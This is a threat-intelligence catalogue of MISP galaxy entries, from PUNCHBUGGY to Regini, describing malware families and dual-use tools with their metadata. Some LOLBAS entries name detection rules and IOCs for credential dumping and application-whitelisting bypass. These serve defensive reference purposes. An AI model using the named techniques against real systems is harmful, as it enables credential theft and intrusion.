PUNCHBUGGY is a backdoor malware used by FIN8 that has been observed targeting POS networks in the hospitality industry. [Morphisec ShellTea June 2019][FireEye Fin8 May 2016] [FireEye Know Your Enemy FIN8 Aug 2016]
Internal MISP references
UUID d8999d60-3818-4d75-8756-8a55531254d8 which can be used as unique global reference for PUNCHBUGGY in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0196 |
| source | MITRE |
| tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PUNCHTRACK
PUNCHTRACK is non-persistent point of sale (POS) system malware utilized by FIN8 to scrape payment card data. [FireEye Fin8 May 2016] [FireEye Know Your Enemy FIN8 Aug 2016]
Internal MISP references
UUID 1638d99b-fbcf-40ec-ac48-802ce5be520a which can be used as unique global reference for PUNCHTRACK in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0197 |
| source | MITRE |
| tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pupy
Pupy is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. [GitHub Pupy] It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). [GitHub Pupy] Pupy is publicly available on GitHub. [GitHub Pupy]
Internal MISP references
UUID 0a8bedc2-b404-4a9a-b4f5-ff90ff8294be which can be used as unique global reference for Pupy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Android', 'Windows'] |
| software_attack_id | S0192 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
PuTTy
PuTTy is an open-source SSH and telnet client.[PuTTY Download Page]
Internal MISP references
UUID 313c78e9-488d-4fbc-a6e5-05c0df3cb8a4 which can be used as unique global reference for PuTTy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5065 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
pwdump
pwdump is a credential dumper. [Wikipedia pwdump]
Internal MISP references
UUID 77f629db-d971-49d8-8b73-c7c779b7de3e which can be used as unique global reference for pwdump in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0006 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
PyDCrypt
PyDCrypt is malware written in Python designed to deliver DCSrv. It has been used by Moses Staff since at least September 2021, with each sample tailored for its intended victim organization.[Checkpoint MosesStaff Nov 2021]
Internal MISP references
UUID 51b2c56e-7d64-4e15-b1bd-45a980c9c44d which can be used as unique global reference for PyDCrypt in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1032 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pysa
Pysa is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.[CERT-FR PYSA April 2020]
Internal MISP references
UUID e0d5ecce-eca0-4f01-afcc-0c8e92323016 which can be used as unique global reference for Pysa in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0583 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
QakBot
QakBot is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. QakBot is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably ProLock and Egregor.[Trend Micro Qakbot December 2020][Red Canary Qbot][Kaspersky QakBot September 2021][ATT QakBot April 2021]
Internal MISP references
UUID 9050b418-5ffd-481a-a30d-f9059b0871ea which can be used as unique global reference for QakBot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0650 |
| source | MITRE |
| tags | ['e096f0dd-fa2c-4771-8270-128c97c09f5b', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
QUADAGENT
QUADAGENT is a PowerShell backdoor used by OilRig. [Unit 42 QUADAGENT July 2018]
Internal MISP references
UUID 2bf68242-1dbd-405b-ac35-330eda887081 which can be used as unique global reference for QUADAGENT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0269 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
QuasarRAT
QuasarRAT is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. QuasarRAT is developed in the C# language.[GitHub QuasarRAT][Volexity Patchwork June 2018]
Internal MISP references
UUID 4bab7c2b-5ec4-467e-8df4-f2e6996e136b which can be used as unique global reference for QuasarRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0262 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
QUIETCANARY
QUIETCANARY is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.[Mandiant Suspected Turla Campaign February 2023]
Internal MISP references
UUID 52d3515c-5184-5257-bf24-56adccb4cccd which can be used as unique global reference for QUIETCANARY in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1076 |
| source | MITRE |
| type | ['malware'] |
QUIETEXIT
QUIETEXIT is a novel backdoor, based on the open-source Dropbear SSH client-server software, that has been used by APT29 since at least 2021. APT29 has deployed QUIETEXIT on opaque network appliances that typically don't support antivirus or endpoint detection and response tools within a victim environment.[Mandiant APT29 Eye Spy Email Nov 22]
Internal MISP references
UUID 947ab087-7550-577f-9ae9-5e82e9910610 which can be used as unique global reference for QUIETEXIT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Network'] |
| software_attack_id | S1084 |
| source | MITRE |
| tags | ['33d35d5e-f0cf-4c66-9be3-a3ffe6610b1a'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
QuietSieve
QuietSieve is an information stealer that has been used by Gamaredon Group since at least 2021.[Microsoft Actinium February 2022]
Internal MISP references
UUID dcdb74c5-4445-49bd-9f9c-236a7ecc7904 which can be used as unique global reference for QuietSieve in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0686 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Quser
According to joint Cybersecurity Advisory AA23-250A (September 2023), Quser is "a valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server".[U.S. CISA Zoho Exploits September 7 2023]
Internal MISP references
UUID 7b78eb31-f251-493b-8058-14a3452e8ccc which can be used as unique global reference for Quser in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5053 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Raccoon Stealer 2.0
Raccoon Stealer is one of the most heavily used information & credential stealers (""infostealers"") in recent years. The ""2.0"" version of Raccoon Stealer was observed in mid-2022, featuring new capabilities designed to improve its stealth.[Sekoia.io Raccoon Stealer June 28 2022] Raccoon Stealer is licensed as a service, and like many other modern infostealer families, the relatively low cost of a Raccoon Stealer subscription (around $75 for weeklong access) contributes to the malware's popularity. Victim credentials acquired via Raccoon Stealer are often resold on illicit, automated marketplaces on the dark web.
More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).
Internal MISP references
UUID 7046193b-96c2-462b-9ba1-ea39a938e8e9 which can be used as unique global reference for Raccoon Stealer 2.0 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5070 |
| source | Tidal Cyber |
| tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Radmin
Radmin is a free remote desktop software application. It has been abused by cyber threat actors such as Akira ransomware operators to facilitate remote access into victim networks.[Sophos Akira May 9 2023]
Internal MISP references
UUID 33c0f985-3e1e-4901-bfee-d3c81bba0d71 which can be used as unique global reference for Radmin in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5281 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Ragnar Locker
Ragnar Locker is a ransomware that has been in use since at least December 2019.[Sophos Ragnar May 2020][Cynet Ragnar Apr 2020]
Internal MISP references
UUID d25f7acd-a995-4b8b-8ffe-ccc9703cdf5f which can be used as unique global reference for Ragnar Locker in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0481 |
| source | MITRE |
| tags | ['cb5803f0-8ab4-4ada-8540-7758dfc126e2', '5e7433ad-a894-4489-93bc-41e90da90019', 'a2e000da-8181-4327-bacd-32013dbd3654', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Raindrop
Raindrop is a loader used by APT29 that was discovered on some victim machines during investigations related to the SolarWinds Compromise. It was discovered in January 2021 and was likely used since at least May 2020.[Symantec RAINDROP January 2021][Microsoft Deep Dive Solorigate January 2021]
Internal MISP references
UUID 80295aeb-59e3-4c5d-ac39-9879158f8d23 which can be used as unique global reference for Raindrop in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0565 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
RainyDay
RainyDay is a backdoor tool that has been used by Naikon since at least 2020.[Bitdefender Naikon April 2021]
Internal MISP references
UUID 42b775bd-0c1d-4ad3-8f7f-cbb0ba84e19e which can be used as unique global reference for RainyDay in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0629 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ramsay
Ramsay is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between Ramsay and the Darkhotel-associated Retro malware.[Eset Ramsay May 2020][Antiy CERT Ramsay April 2020]
Internal MISP references
UUID dc307b3c-9bc5-4624-b0bc-4807fa1fc57b which can be used as unique global reference for Ramsay in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0458 |
| source | MITRE |
| type | ['malware'] |
RARSTONE
RARSTONE is malware used by the Naikon group that has some characteristics similar to PlugX. [Aquino RARSTONE]
Internal MISP references
UUID a9c9fda8-c156-44f2-bc7e-1b696f3fbaa2 which can be used as unique global reference for RARSTONE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0055 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rasautou
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Remote Access Dialer
Author: Tony Lambert
Paths: * C:\Windows\System32\rasautou.exe
Resources: * https://github.com/fireeye/DueDLLigence * https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Detection: * Sigma: win_rasautou_dll_execution.yml * IOC: rasautou.exe command line containing -d and -p[Rasautou.exe - LOLBAS Project]
Internal MISP references
UUID 8d34715e-1018-40fc-bf09-4eca69be830e which can be used as unique global reference for Rasautou in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5146 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Raspberry Robin
A highly active worm that spreads through removable media devices and abuses built-in Windows utilities after initial infection of the host. Raspberry Robin has evolved into a major malware delivery threat, with links to infections involving Cobalt Strike, SocGholish, Truebot, and ultimately ransomware.[Microsoft Security Raspberry Robin October 2022]
Delivers: Cobalt Strike[Microsoft Security Raspberry Robin October 2022], SocGholish[Microsoft Security Raspberry Robin October 2022], Truebot[Microsoft Security Raspberry Robin October 2022][U.S. CISA Increased Truebot Activity July 6 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/raspberryrobin/
PulseDive (IOCs): https://pulsedive.com/threat/Raspberry%20Robin
Internal MISP references
UUID dc0dbd15-0916-43c7-a3b9-6dc3ce0771be which can be used as unique global reference for Raspberry Robin in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5002 |
| source | Tidal Cyber |
| tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
| type | ['malware'] |
RATANKBA
RATANKBA is a remote controller tool used by Lazarus Group. RATANKBA has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. RATANKBA has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. [Lazarus RATANKBA] [RATANKBA]
Internal MISP references
UUID 40466d7d-a107-46aa-a6fc-180e0eef2c6b which can be used as unique global reference for RATANKBA in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0241 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
RawDisk
RawDisk is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.[EldoS RawDisk ITpro][Novetta Blockbuster Destructive Malware]
Internal MISP references
UUID d86a562d-d235-4481-9a3f-273fa3ebe89a which can be used as unique global reference for RawDisk in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0364 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
RawPOS
RawPOS is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. [Kroll RawPOS Jan 2017] [TrendMicro RawPOS April 2015] [Visa RawPOS March 2015] FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. [Mandiant FIN5 GrrCON Oct 2016] [DarkReading FireEye FIN5 Oct 2015]
Internal MISP references
UUID 6ea1bf95-fed8-4b94-8071-aa19a3af5e34 which can be used as unique global reference for RawPOS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0169 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rclone
Rclone is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. Rclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.[Rclone][Rclone Wars][Detecting Rclone][DarkSide Ransomware Gang][DFIR Conti Bazar Nov 2021]
Internal MISP references
UUID 1f3f15fa-1b4b-494d-abc8-c7f8a227b7b4 which can be used as unique global reference for Rclone in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S1040 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'a40b7316-bef6-4186-9764-58ce6f033850', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '8bf128ad-288b-41bc-904f-093f4fdde745', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
RCSession
RCSession is a backdoor written in C++ that has been in use since at least 2018 by Mustang Panda and by Threat Group-3390 (Type II Backdoor).[Secureworks BRONZE PRESIDENT December 2019][Trend Micro Iron Tiger April 2021][Trend Micro DRBControl February 2020]
Internal MISP references
UUID 38c4d208-fe38-4965-871c-709fa1479ba3 which can be used as unique global reference for RCSession in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0662 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
rcsi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Non-Interactive command line inerface included with Visual Studio.
Author: Oddvar Moe
Paths: * no default
Resources: * https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
Detection: * Sigma: proc_creation_win_csi_execution.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: proc_creation_win_csi_execution.yml[rcsi.exe - LOLBAS Project]
Internal MISP references
UUID 9a5cff11-6bad-407a-a53c-2562a56ac024 which can be used as unique global reference for rcsi in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5233 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
RDAT
RDAT is a backdoor used by the suspected Iranian threat group OilRig. RDAT was originally identified in 2017 and targeted companies in the telecommunications sector.[Unit42 RDAT July 2020]
Internal MISP references
UUID 567da30e-fd4d-4ec5-a308-bf08788f3bfb which can be used as unique global reference for RDAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0495 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
RDFSNIFFER
RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.[FireEye FIN7 Oct 2019]
Internal MISP references
UUID ca4e973c-da15-46a9-8f3a-0b1560c9a783 which can be used as unique global reference for RDFSNIFFER in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0416 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
RDP Recognizer
RDP Recognizer is a tool that can be used to brute force RDP passwords and check for RDP vulnerabilities. U.S. authorities observed BianLian Ransomware Group actors downloading the tool during intrusions.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID 22d9f7be-7447-4cce-90f0-67a13d4b6a82 which can be used as unique global reference for RDP Recognizer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5012 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
rdrleakdiag
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Windows resource leak diagnostic tool
Author: John Dwyer
Paths: * c:\windows\system32\rdrleakdiag.exe * c:\Windows\SysWOW64\rdrleakdiag.exe
Resources: * https://twitter.com/0gtweet/status/1299071304805560321?s=21 * https://www.pureid.io/dumping-abusing-windows-credentials-part-1/ * https://github.com/LOLBAS-Project/LOLBAS/issues/84
Detection: * Sigma: proc_creation_win_rdrleakdiag_process_dumping.yml * Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html * Elastic: credential_access_cmdline_dump_tool.toml[rdrleakdiag.exe - LOLBAS Project]
Internal MISP references
UUID 3b37c81a-9574-4ac3-a996-d4cfe1e3ddb1 which can be used as unique global reference for rdrleakdiag in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5147 |
| source | Tidal Cyber |
| tags | ['9fbc403c-bd2e-458a-a202-a65b8201e973', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Reaver
Reaver is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of Control Panel items.[Palo Alto Reaver Nov 2017]
Internal MISP references
UUID ca544771-d43e-4747-80e5-cf0f4a4836f3 which can be used as unique global reference for Reaver in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0172 |
| source | MITRE |
| type | ['malware'] |
RedLeaves
RedLeaves is a malware family used by menuPass. The code overlaps with PlugX and may be based upon the open source tool Trochilus. [PWC Cloud Hopper Technical Annex April 2017] [FireEye APT10 April 2017]
Internal MISP references
UUID 5264c3ab-14e1-4ae1-854e-889ebde029b4 which can be used as unique global reference for RedLeaves in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0153 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Reg
Reg is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. [Microsoft Reg]
Utilities such as Reg are known to be used by persistent threats. [Windows Commands JPCERT]
Internal MISP references
UUID d796615c-fa3d-4afd-817a-1a3db8c73532 which can be used as unique global reference for Reg in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0075 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ec4a7c87-051b-4b7d-8acc-03696fe2113e', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '8bf128ad-288b-41bc-904f-093f4fdde745', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Regasm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Part of .NET
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Resources: * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
Detection: * Sigma: proc_creation_win_lolbin_regasm.yml * Elastic: execution_register_server_program_connecting_to_the_internet.toml * Splunk: suspicious_regsvcs_regasm_activity.md * Splunk: detect_regasm_with_network_connection.yml * IOC: regasm.exe executing dll file[LOLBAS Regasm]
Internal MISP references
UUID 1e892f4b-5398-44ac-aeb4-2e50f70c5716 which can be used as unique global reference for Regasm in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5148 |
| source | Tidal Cyber |
| tags | ['7d31d8f7-375b-4fb3-a631-51b42e58d95a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
RegDuke
RegDuke is a first stage implant written in .NET and used by APT29 since at least 2017. RegDuke has been used to control a compromised machine when control of other implants on the machine was lost.[ESET Dukes October 2019]
Internal MISP references
UUID 52dc08d8-82cc-46dc-91ae-383193d72963 which can be used as unique global reference for RegDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0511 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Regedit
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to manipulate registry
Author: Oddvar Moe
Paths: * C:\Windows\regedit.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_regedit_import_keys_ads.yml * IOC: regedit.exe reading and writing to alternate data stream * IOC: regedit.exe should normally not be executed by end-users[Regedit.exe - LOLBAS Project]
Internal MISP references
UUID 16cc6ff2-8804-4863-aede-40c4376e0af3 which can be used as unique global reference for Regedit in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5149 |
| source | Tidal Cyber |
| tags | ['36affa3d-c949-4e1b-8667-299490580dd5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Regin
Regin is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some Regin timestamps date back to 2003. [Kaspersky Regin]
Internal MISP references
UUID e88bf527-bb9c-45c3-b86b-04a07dcd91fd which can be used as unique global reference for Regin in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0019 |
| source | MITRE |
| type | ['malware'] |
Regini
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to manipulate the registry
Author: Oddvar Moe
